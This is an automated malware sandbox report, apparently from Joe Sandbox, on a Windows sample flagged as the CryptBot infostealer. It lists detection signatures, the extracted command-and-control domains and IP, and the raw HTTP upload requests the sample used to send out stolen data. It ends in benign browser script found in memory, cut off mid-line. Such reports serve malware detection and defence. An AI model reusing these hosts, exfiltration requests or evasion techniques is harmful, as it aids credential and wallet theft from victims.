Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561847
MD5: 4d727ea77c6a382bccbb1ee8970b67ee
SHA1: 9b7899c63a601a2421715a6304c0f53af14f7b1a
SHA256: 25ac0cfb064bd71d2d97aad7491824915a7bbdc4b80e705385617dbd0e35a673
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: file.exe.2828.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["Desktopn.top", "home.fvtekk5pn.top"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_002D15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_6C5E14B0
Source: file.exe, 00000000.00000003.2116332717.00000000076A2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_0af077cb-2
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 9_2_002D81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C600860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C6AC920
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C60A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C6BF960h 9_2_6C5FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C676BF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C6884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C60C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C60A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C60A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C60E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C600740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 9_2_6C680730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 9_2_6C63A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C600260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C6BD014h] 9_2_6C6B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C657D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C653840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 9_2_6C60D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C61BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C61BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C65B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C60D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 9_2_6C60D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_6C659600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C6BDFF4h 9_2_6C653690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 9_2_6C60D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C683140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C5FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C65B1F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C5FB241
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C60D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C6773A0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 27MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49752 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49762 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.6:49791 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: Desktopn.top
Source: Malware configuration extractor URLs: home.fvtekk5pn.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 461Content-Type: multipart/form-data; boundary=------------------------iibd4tTPtuSlsLIa3ywm7pData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 69 69 62 64 34 74 54 50 74 75 53 6c 73 4c 49 61 33 79 77 6d 37 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 65 72 69 72 75 6c 75 77 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 9d 8b cd 48 3e a7 b2 e9 28 fc 15 69 2d 78 f9 19 6e e8 a5 37 d6 ee 29 a8 93 01 94 0b f4 ad 40 6a 13 a4 db 1a e8 f4 6e 27 36 34 fe e0 d3 6a c9 cc fb e6 98 19 bf e4 85 4b b7 26 56 e8 8b a7 d5 f4 b5 fe de f7 0f ce d7 02 9a db d7 1a a1 89 98 a3 e7 5a 5a 92 21 7e 39 66 5c 6f a9 4a f0 1d bb 7c a2 dc 4f 2b a0 51 59 67 dd 87 47 96 ec 50 d2 1b 5d 4c 58 8f 0d b1 59 74 10 0c 42 46 f4 48 ee 64 61 14 66 f0 89 c1 ea d7 aa 18 31 a9 3b de 15 ca ef e3 ee b5 5e d0 5c e3 cb 30 ac 1d 6a cc af c4 69 7c 2f 03 02 88 bb ef 9e ed 03 7b 03 a4 bb bd f1 2c 1c 1e d2 55 da 63 d9 db 1b 36 ca 95 16 fd 2b 41 64 2d 3f c2 b3 46 24 ca d4 48 ac 6b e6 39 15 24 27 3e 72 b2 3a 80 91 fd 0a 24 24 f3 2d 02 9f 59 28 f0 0e 59 df 2a cd e8 48 0c 72 ed 57 a0 c8 bb df 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 69 69 62 64 34 74 54 50 74 75 53 6c 73 4c 49 61 33 79 77 6d 37 70 2d 2d 0d 0a Data Ascii: --------------------------iibd4tTPtuSlsLIa3ywm7pContent-Disposition: form-data; name="file"; filename="Reriruluw.bin"Content-Type: application/octet-streamH>(i-xn7)@jn'64jK&VZZ!~9f\oJ|O+QYgGP]LXYtBFHdaf1;^\0ji|/{,Uc6+Ad-?F$Hk9$'>r:$$-Y(Y*HrW9--------------------------iibd4tTPtuSlsLIa3ywm7p--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 89582Content-Type: multipart/form-data; boundary=------------------------RkzlTwzHEIOpy2QOCA4s3EData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 6b 7a 6c 54 77 7a 48 45 49 4f 70 79 32 51 4f 43 41 34 73 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 69 67 75 70 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a b5 e5 31 e8 cb 13 b1 2c 8c 9f 54 63 f9 40 6f b2 97 ac ba ed 6c 28 cc 91 c6 d0 cf 95 f0 d9 a6 bb d2 ea 6c 92 73 5c f3 90 be db 30 db b2 69 fc ef 1d 92 dc f8 00 db 33 cb 1e 68 85 08 2f ac b7 d3 73 b6 99 1f ef b2 0c 0a e6 3d ea 77 25 3d fe 65 47 fa c0 1b 15 9d 3c 07 83 9b 50 7c 65 d6 0f 69 0f 70 d5 90 50 9b 29 f6 7c 79 e4 a3 4b 95 00 f4 b7 ac 4e da 41 b9 ba 92 51 c3 2d 26 63 db 98 16 0d 68 8a 0e f1 a6 09 57 ac d3 aa a6 3c 3d e9 cf ef 4b 3b cd 37 c9 81 b7 00 20 2f e8 b3 4b 25 46 81 9b 80 85 85 01 89 2d ed ce 69 3d 86 c4 52 67 c1 5b 2d db 7c 24 95 56 8d 6f 39 d1 66 b1 93 ec 89 43 e6 07 af ac 06 97 db bf f9 83 cb 81 79 2d f8 58 ff f4 2d b3 f1 fb 33 41 fb bf 03 ce 03 59 4f e9 2d 9f 89 8d c1 31 6a 43 8a 7c bd 73 10 10 4c b0 f4 8a 15 f2 e3 43 3a 1b 87 c5 41 03 ff a4 d0 44 be 85 24 d5 37 45 59 e3 28 8f 43 2c 43 00 49 c6 f2 f1 32 ae 98 b9 5b ad 13 2f 65 d2 7b e0 e2 54 83 6c 45 4b 39 cf d1 38 4f 26 e7 2c 45 f8 d0 57 6f 15 c8 f3 5f 94 f2 2c ad 8b 68 56 0e 69 5e ca 23 bb 2b 85 98 8c f0 58 86 e7 e2 23 4e 40 eb 1b 84 f9 7c 77 87 9e d2 4c 59 78 11 15 28 b0 74 e0 74 cf fa 84 06 88 76 fe 67 fe cc d1 4b 4a 1b 8e 3e 39 97 a2 f4 d6 36 6d 6a bd f4 20 28 af cf 31 7f 18 94 04 8d 08 c1 69 69 f6 62 a1 06 e1 20 93 26 d0 09 4b 77 26 51 ab da e4 80 63 7b 9d fa 2b 84 4f 2d 57 63 48 f3 b4 91 ba e1 87 bb ca 59 29 50 96 12 a2 c7 f0 54 43 50 15 aa a7 11 ea cc 4e 33 c9 1e db 75 82 fd 96 33 c0 ec 02 c4 88 61 0c b8 9f 01 a1 a3 80 f2 4f 46 27 a5 4b 7f 28 9a b4 5d 7e 35 84 f0 55 66 53 2a 12 e2 b2 98 dd 1d 2e ca d8 35 ea 91 78 48 48 4a 15 7f 13 f7 d1 26 48 0d 76 0c 1e 33 79 fd 19 7f 2b 4d 23 10 f9 34 1d d1 72 33 e8 28 a2 7a ed 68 28 41 c2 e8 72 72 a2 ea 4a f0 70 e3 85 fb dc 30 43 2c 7c 99 cf 84 68 de f4 53 6d a6 6d 73 4e fc be cc 61 f0 83 02 d4 96 2c 29 7f e9 66 b2 1b ad 1b 0e 3c d1 ef a4 f3 fe 9d d5 51 01 44 52 05 db 74 66 77 b3 ac 28 65 2d 86 0a 71 4d fb 6f 79 be b9 7a 41 3f f3 62 8e 31 5c e8 73 d9 a5 3c 4b 2f 37 96 f4 e4 93 62 0c 4d fa c4 52 9a 64 d9 92 b1 af be 70 c9 53 96 e5 5e e4 5b 86 10 67 36 35 52 45 20 e2 3d 32 37 5c 90 eb 1e 41 a8 14 47 5b 21 99 10 c6 d3 66 88 f0 7f b6 3c 25 bf 17 da 3c 0b 0b 1e c4 11 2c 3c 1b 3a 2c 03 bc 2b ab 70 6b 9c b2 bf cb fd ad 79 36 4a 1e 33 4e 43 e6 2c 90 d1 24 7b b9 33 71 6e 4f 72 bf f5 d5 d2 77 ea 18 4a 76 23 36 36 9b 49 02 27 cd ae 86 57 60 2a 8e bf e2 b9 79 ab e0 c6 fa a4 ae 44 db aa 4a 8a
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 30402Content-Type: multipart/form-data; boundary=------------------------pP2o6FJ7kQsfThYLn8QyWXData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 50 32 6f 36 46 4a 37 6b 51 73 66 54 68 59 4c 6e 38 51 79 57 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 65 67 65 76 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 14 1e 20 47 c7 44 bc 6e e6 a1 06 fa 3c 04 62 2d 6c f8 9e 1b 30 84 b6 e5 f9 62 8b 22 6e 74 94 0b 73 34 96 fe 89 41 7c 97 f4 a2 a1 18 81 0e 23 6b 85 f4 75 f1 80 a6 ef ca db 20 4d 29 a9 67 1c ae 5b 17 87 93 da 47 1c fc 41 88 91 08 97 12 86 fa 64 a3 2a 31 6c cd 15 f8 40 cd 99 40 16 21 f7 7d 3d 1b 3b eb 43 14 5f d8 3c 99 42 4b 27 eb 32 73 04 d3 42 00 d6 bb 55 3d ee c1 2b a3 28 9b c1 2a d5 dc 33 95 3f 20 52 3d ea a8 6c a3 d1 ca 11 ab 80 9d 8c 08 f1 e5 db c3 b3 bc a6 28 d4 63 41 71 56 bc c6 a1 e4 55 36 81 ad 80 44 22 30 f0 ac b0 a0 11 9b 3f fa 17 ca 0b 04 79 93 35 13 63 6b 73 97 87 6b ea 81 57 a0 0d ef 30 6e 7e c5 0c 07 5c ef 38 c6 1f 1e b8 80 05 a4 f7 df b6 5e b8 5a fd 49 dd 6a 28 ee 40 cc 86 06 74 ea f2 d1 27 f2 62 e6 b5 b5 06 6f b4 45 61 8f bc 9f bf cc 5a a2 38 a6 6f 3a 5d f0 64 d6 d1 5e 63 32 5b 96 56 00 44 17 21 ac 33 56 97 6b 22 d1 48 b4 94 80 c2 fc 7c 2a 58 b8 49 ec ed b4 ac d7 23 fb 1c e2 a5 15 49 92 ef 9d ce b2 d9 25 75 2f c9 03 c0 04 95 bd 13 70 35 97 a2 c9 b2 dd 90 d5 70 68 1e 8a 20 e9 93 23 16 93 09 a3 89 9d 7a a2 6e eb f8 d4 87 d3 38 13 0d 2d 6e 2e 1d 72 03 47 98 f4 09 e5 09 ae dd 5a 37 5a 76 9f 54 c9 43 79 7f ae 9e 19 56 94 f5 a9 00 1b 51 35 24 ff a9 18 18 0f 02 c6 d0 d9 83 c9 9b 85 4c 6b b6 2c 16 ef 1d 38 61 38 c6 31 cd 25 f7 42 a3 3c 4f e3 2c 86 06 94 2d 83 6e 67 65 24 e1 27 55 e5 66 f0 32 6a 02 28 66 98 76 0f 8a 27 81 4c dd 4d 4f 0e 8c d5 78 0e 42 0a a6 65 6c 37 23 ac 44 73 15 82 f0 0c 74 88 46 8a 39 09 e5 c3 9a ea 86 d4 b5 43 b8 4f fc 06 16 2e 9f 93 f7 f9 87 4a 9d 14 8b d0 52 7a 5d 7a a0 04 96 51 51 94 3e 2d bb 0e 90 ee a5 9c 68 37 7b 4c 6a c8 dd ff d2 f6 90 20 c2 87 43 1f 9e ae 84 cc 54 e4 61 52 55 e4 ea de 10 c3 7f bf 34 3f e0 9c e8 0d b9 0e 85 53 26 ce f1 64 24 49 a1 0b 82 4c 3b 73 d8 f3 46 6b 39 24 15 0e 5d b5 16 72 29 62 dd 2a 8d 71 13 01 90 59 2c 1c 0f 18 93 95 57 c7 1b dd 9b c5 3d 48 e9 d2 91 80 42 54 66 1a 5e fc b9 e7 c9 d3 76 88 1d 9b 85 da 10 24 8b 9f a5 39 85 7a b4 55 b4 a2 c3 8d 8a f4 43 a2 b2 52 6b ab f8 14 fc ff 96 74 15 84 ae c4 7d 2c 74 bd be 57 5c f1 63 55 e4 81 77 2e d4 e6 4e fa 9a 2e 0a 5e 10 95 5b 3c 7e 44 25 c1 db d6 d0 7e f8 46 6e 22 4b 43 88 00 03 a6 be ba 23 f1 cd 26 70 5e 0d 5f 0f ef 64 e4 c6 e7 b7 2c c9 0b ab 33 c3 1d cb 72 31 a3 9c e5 83 e5 e6 f8 bb 63 dd da 29 23 51 d0 e0 55 d4 17 02 c5 68 d2 f7 33 ae 92 37 8f 50 a7 6a ae bb da b1 b4 6d c1 0b 96 8e e1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.2475389666.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2475561346.000000240040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2475471028.000000240100C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000003.2475389666.0000002400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2475561346.000000240040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2475471028.000000240100C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px 